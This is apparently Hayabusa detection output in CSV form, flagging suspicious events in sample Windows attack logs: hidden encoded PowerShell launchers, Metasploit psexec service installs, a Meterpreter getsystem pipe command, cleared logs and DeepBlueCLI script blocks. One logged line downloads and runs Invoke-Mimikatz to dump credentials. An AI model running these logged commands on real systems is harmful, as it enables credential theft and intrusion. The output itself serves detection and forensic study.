0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:53.753 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x620 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:53.785 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xea8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:53.847 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x200 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe68 | User: IEUser | LID: 0x6793c,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:15:54.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x480 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:22.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf9c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:26.543 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:26.575 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x160 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:26.637 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x98c | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:26.903 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc 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 | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x11c | User: IEUser | LID: 0x6793c,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:19:26.918 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7d0 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 04:20:19.153 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc50 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx 2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx 2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 
2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand 
start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx 2016-09-21 12:41:13.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx 2016-09-21 12:41:13.078 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx 2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,../hayabusa-rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx 2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Persis | PrivEsc,Addition of SID History to Active Directory Object,,../hayabusa-rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx 2017-08-31 01:31:49.876 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:49.908 +09:00,SEC511,4104,info,,PwSh Scriptblock 
Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus 
Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:32:05.661 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:32:07.371 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:32:13.803 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:32:13.803 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:32:13.804 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:32:13.804 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:32:14.325 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:33:28.096 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:33:34.598 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:33:34.600 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:33:34.601 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:33:35.043 +09:00,SEC511,4104,info,,PwSh Scriptblock 
Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:38:42.201 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[3].""#text""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:38:42.204 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:38:45.375 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[4].""#text""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:38:45.376 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:38:48.413 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[5].""#text""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:38:48.416 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:38:51.394 +09:00,SEC511,4104,info,,PwSh Scriptblock 
Log,"$eventxml.Event.EventData.Data[6].""#text""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:38:51.396 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:17.974 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.563 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.569 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
